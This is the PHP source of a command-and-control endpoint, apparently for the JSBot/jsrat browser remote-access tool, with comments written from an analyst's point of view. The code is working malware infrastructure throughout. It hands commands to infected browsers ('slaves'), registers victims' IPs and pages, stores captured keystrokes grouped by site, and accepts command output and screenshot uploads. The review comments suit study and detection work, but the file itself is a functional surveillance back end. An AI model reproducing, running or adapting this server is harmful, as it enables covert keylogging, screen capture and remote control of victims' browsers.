<?php
// portal.php - client-facing endpoint of the JSBot / jsrat command-and-control server.
// Documented from an analyst's perspective: this is the server half of a browser-based
// remote-access tool, so the protocol below is what web-server logs and network monitoring
// would observe. Mode is selected by the FIRST query-string key (see key($_GET) below):
//   ?recv             -> client polls for a pending command; JSON status 'ok_cmd' or 'ok_null'
//   ?post=hello       -> client check-in / registration (POST body: ref)
//   ?post=klog        -> client uploads captured keystroke text (POST body: log, ref)
//   ?post=console     -> client uploads base64-encoded command output (POST body: cmd, log)
//   ?post=screenshot  -> client uploads an image blob (POST body: img)
// Every response is JSON with a 'status' field. No branch performs authentication; the only
// per-client identity is $uuid from jsrat->uuid(), defined in sys/head.php (not visible here).
// Every client-supplied value is written to storage as-is, with no validation or length limit,
// so whatever renders these tables later must treat them as untrusted input.
header('Access-Control-Allow-Origin: *'); // wildcard CORS: any origin may call this endpoint from a browser
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
// Cache-defeating headers so each client poll reaches the server instead of a cached response
header("Cache-Control: no-store, no-cache, must-revalidate"); // HTTP/1.1
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache"); // HTTP/1.0
header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); // Date in the past
// Initialise classes and shared state: $db and the jsrat class come from this include (not shown)
include 'sys/head.php';
// Per-client identifier; how jsrat derives it is not visible here - presumably from request
// data, so confirm in sys/head.php before relying on it as a stable client key
$uuid = (new jsrat)->uuid();
// Serve commands to the client.
// key($_GET) returns the first key of the query string, so 'recv' must be the first parameter.
if(key($_GET) === 'recv') {
// Look up one row with active == 'true' (the third argument is presumably a row limit - verify in $db)
if($cmd = $db->table('cnc')->find('active', 'true', 1)->get()) {
$cmd = $cmd[array_key_first($cmd)];
// NOTE(review): after the line above $cmd is a single row, so this reads the value of the row's
// first column rather than its key; whether that is the record id depends on the table layout.
$id = $cmd[array_key_first($cmd)];
// Check whether the command is still within its validity window
$timer = time() - $cmd['timeIssued'];
// Commands older than 31 seconds are deactivated and the client receives 'ok_null'
if( $timer > 31 ) {
$db->table('cnc')->find('timeIssued', $cmd['timeIssued'], 1)->change('active', 'false');
echo json_encode(array('status' => 'ok_null'));
die();
}
// A target of 'x' means the command is for every client; anything else is a target list
if($cmd['target'] != 'x') {
// Substring test of $uuid against the target list. strpos returns 0 for a match at
// offset 0, which the '!' also treats as "not found", so such a client is skipped.
if(!strpos($cmd['target'], $uuid)) {
// Not a target for this command
echo json_encode(array('status' => 'ok_null'));
die();
}
}
// Same substring test against the list of clients that already received this command
if(!strpos($cmd['slavesReached'], $uuid)) {
// Record this client as reached; entries are ':'-delimited
$SR = "{$cmd['slavesReached']}{$uuid}:";
$db->table('cnc')->find(
'timeIssued', $cmd['timeIssued'], 1
)->change('slavesReached', $SR);
// Build the response: arguments are split on the '|#:#|' delimiter and emitted as argument1..argumentN
$args = explode('|#:#|', $cmd['arguments']);
$return = array('status' => 'ok_cmd','command' => $cmd['command']);
$i = 1;
foreach($args as $key => $val) {
$return['argument'.$i] = $val;
$i++;
}
echo json_encode($return);
// Commands deleted immediately after being served, so they do not linger until the 31 s timeout.
// The deletion uses $id from above; see the note there about which column it actually holds.
if($cmd['command'] === 'keylog' || $cmd['command'] === 'stopkeylog') {
$db->table('cnc')->id($id)->delete();
}
}
// Client already received this command
else {
echo json_encode(array('status' => 'ok_null'));
}
}
// No active command
else {
echo json_encode(array('status' => 'ok_null'));
}
}
// Receive data from the client
elseif(key($_GET) === 'post') {
// 'hello' is a client check-in
if($_GET['post'] === 'hello') {
// Known client: refresh lastSeen and the page it reports via POST 'ref' (stored unvalidated)
if($slave = $db->table('slaves')->find('uuid', $uuid)->get()) {
$slave = $slave[array_key_first($slave)];
if( $db->table('slaves')->find('uuid', $uuid, 1)->change('lastSeen', time()) &&
$db->table('slaves')->find('uuid', $uuid, 1)->change('page', $_POST['ref'])) {
$status = 'ok_update';
// The 'log' field of the response carries the stored per-client keylog flag back to the client
$keylogger = $slave['keylog'];
} else {
$status = 'error_update';
$keylogger = 'null';
}
echo json_encode(array('status' => $status, 'log' => $keylogger));
die();
}
// Unknown client: create its record. ip/ua/os come from jsrat helpers whose source is not
// visible here; presumably derived from request headers, so treat them as client-controlled.
else {
$status = ($db->table('slaves')->put(array(
'ip' => (new jsrat)->getIP(),
'lastSeen' => time(),
'firstSeen' => time(),
'ua' => (new jsrat)->getUA(),
'os' => (new jsrat)->getOS(),
'uuid' => $uuid,
// Falls back to the Referer header when the client posted no 'ref'
'page' => ((empty($_POST['ref']))?$_SERVER["HTTP_REFERER"]:$_POST['ref']),
'keylog' => "false"
)))?'ok_new':'error_new';
echo json_encode(array('status' => $status, 'log' => 'false'));
die();
}
// Keystroke upload; note the loose '==' comparison on the mode value
} elseif($_GET['post'] == 'klog') {
$log = $_POST['log'];
$ref = (!empty($_POST['ref']))?$_POST['ref']:''; //currentRef
// Existing log for this client: append, inserting a [SITE: ...] marker when the page changed
if($row = $db->table('keylogs')->find('uuid', $uuid, 1)->get()) {
$row = $row[array_key_first($row)];
if($row['currentRef'] == $ref || $ref == '') {
$db->table('keylogs')->find('uuid', $uuid)->change('log', $row['log'].$log);
} else {
$db->table('keylogs')->find('uuid', $uuid)->change('log', "{$row['log']}\n\n[SITE: {$ref}]\n{$log}");
$db->table('keylogs')->find('uuid', $uuid)->change('currentRef', $ref);
}
$status = 'kl_update';
} else {
// First upload: seed the log with the page from the client's slaves record.
// There is no guard for a client that has no slaves row; get() returning a non-array would fail here.
$slave = $db->table('slaves')->find('uuid', $uuid,1)->get();
$slave = $slave[array_key_first($slave)];
$db->table('keylogs')->put(array(
'uuid' => $uuid,
'log' => "[Keylog Started]>\n\n[SITE: {$slave['page']}]\n{$log}",
'currentRef' => $slave['page']
));
$status = 'kl_new';
}
echo json_encode(array('status' => $status));
// Command-output upload; $_POST['log'] is base64 and decoded non-strictly (malformed input yields garbage, not an error)
} elseif($_GET['post'] == 'console' && isset($_POST['cmd'])) {
$output = (empty($_POST['log']))?'undefined':base64_decode($_POST['log']);
// $command is assigned but not used below
$command = $_POST['cmd'];
// $row is only used as an existence test; each client keeps a single console row that is overwritten
if($row = $db->table('console')->find('uuid', $uuid, 1)->get()) {
$db->table('console')->find('uuid', $uuid)->change('log', $output);
$status = 'console_update';
} else {
$db->table('console')->put(array(
'uuid' => $uuid,
'log' => $output
));
$status = 'console_new';
}
echo json_encode(array('status' => $status));
// Image upload; the posted blob is stored exactly as received, with no size or format check
} elseif($_GET['post'] == 'screenshot' && isset($_POST['img'])) {
$db->table('screenshots')->put(array(
'uuid' => $uuid,
'blob' => $_POST['img']
));
echo json_encode(array('status' => 'img_store'));
} else {
// Unknown 'post' value
echo json_encode(array('status' => 'ok_null'));
}
} else {
// Neither 'recv' nor 'post' as the first query key
echo json_encode(array('status' => 'ok_null'));
}
?>